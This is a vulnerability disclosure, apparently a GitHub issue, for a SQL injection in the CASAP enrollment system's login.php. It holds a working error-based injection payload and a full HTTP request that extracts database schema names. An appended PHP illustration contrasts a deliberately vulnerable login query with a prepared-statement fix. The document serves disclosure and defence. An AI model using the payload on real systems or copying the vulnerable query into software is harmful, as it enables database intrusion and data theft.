
SourceCodester CASAP Automated Enrollment System using PHP/MySQLi with Source Code login.php SQL injection #17

Open
1097hzy opened this issue Apr 22, 2024 · 0 comments

1097hzy commented Apr 22, 2024


NAME OF AFFECTED PRODUCT(S)

  • CASAP Automated Enrollment System using PHP/MySQLi with Source Code

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • Deng Shengke

Vulnerable File

  • login.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • Line 4 of the \Final\login.php file reads user input from a POST parameter. The value is then passed on without proper sanitization or validation and is ultimately used in the database query built on line 21 of \Final\login.php. This can lead to SQL injection attacks.

Impact

  • Attackers can exploit this vulnerability to gain database privileges, which can result in the disclosure of a large amount of data from the database. If the database account has DBA privileges, it may also lead to privileges on the server host being obtained.

DESCRIPTION

  • Deng Shengke has discovered a serious issue in "CASAP Automated Enrollment System using PHP/MySQLi with Source Code" that can allow attackers to obtain large amounts of database content through SQL injection attacks.

Vulnerability details and POC

Payload

  • username=admin' OR ROW(5655,9136)>(SELECT COUNT(*),CONCAT(0x0a,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 18,1),0x0a,FLOOR(RAND(0)*2))x FROM (SELECT 7436 UNION SELECT 7676 UNION SELECT 1226 UNION SELECT 4614)a GROUP BY x)-- Opra&password=password

Burp Suite (POC)

POST /login.php HTTP/1.1
Host: www.final.com:10001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 302
Origin: http://www.final.com:10001
Connection: close
Referer: http://www.final.com:10001/index.php

username=admin' OR ROW(5655,9136)>(SELECT COUNT(*),CONCAT(0x0a,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 18,1),0x0a,FLOOR(RAND(0)*2))x FROM (SELECT 7436 UNION SELECT 7676 UNION SELECT 1226 UNION SELECT 4614)a GROUP BY x)-- Opra&password=password
  • Here is the MySQL database name obtained from the sqlmap attack
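Added illustration (not the project's login.php, which is not reproduced in this issue): a minimal PHP/MySQLi login handler in the vulnerable shape the report describes (a POST value read and concatenated into the query text), with a comment showing what the query becomes under the report's payload and why the `FLOOR(RAND(0)*2) ... GROUP BY x` construction leaks data through a MySQL duplicate-key error, followed by a parameterised replacement. The `$conn` connection, the `users` table and its column names are assumptions for the example.

```php
<?php
// Added example, not code from the CASAP project. $conn, the `users` table and
// its columns are assumed; the hardened variant also assumes the MySQL native
// driver (mysqlnd) for get_result().

// --- Vulnerable shape (what the report describes) ---
function login_vulnerable(mysqli $conn, string $username, string $password): ?array
{
    // Raw POST input concatenated straight into the SQL text.
    $sql = "SELECT * FROM users WHERE username='$username' AND password='$password'";
    // With the report's payload the statement becomes:
    //   SELECT * FROM users WHERE username='admin' OR ROW(5655,9136)>(
    //     SELECT COUNT(*),CONCAT(0x0a,(SELECT ... FROM INFORMATION_SCHEMA.SCHEMATA
    //     LIMIT 18,1),0x0a,FLOOR(RAND(0)*2))x FROM (...)a GROUP BY x)-- Opra' AND password='password'
    // The "-- " comments out the password check. GROUP BY on a key built from
    // RAND(0) makes MySQL compute the same group key twice and fail with a
    // duplicate-entry error whose message contains the schema name selected
    // from INFORMATION_SCHEMA: the data is exfiltrated via the error text.
    $result = $conn->query($sql);   // false (or an exception) on the provoked error
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// --- Hardened form: query text and user data never mix ---
function login_hardened(mysqli $conn, string $username, string $password): ?array
{
    $stmt = $conn->prepare(
        "SELECT id, username, password_hash FROM users WHERE username = ? LIMIT 1"
    );
    $stmt->bind_param('s', $username);   // the payload is sent as a plain string value
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Verify against a stored hash rather than matching plaintext in SQL.
    if ($row !== null && password_verify($password, $row['password_hash'])) {
        unset($row['password_hash']);
        return $row;
    }
    return null;
}

// Example dispatch; assumes $conn was created elsewhere with
// mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT) so failures throw
// instead of returning false.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $user = login_hardened($conn, $_POST['username'] ?? '', $_POST['password'] ?? '');
    echo $user ? 'login ok' : 'invalid credentials';
}
```

Binding the value with `bind_param` is what closes the hole: the quote and `-- ` in the payload are no longer interpreted as SQL. Switching the password check to `password_verify()` is a separate improvement, but the report's payload would still be neutralised by the prepared statement alone.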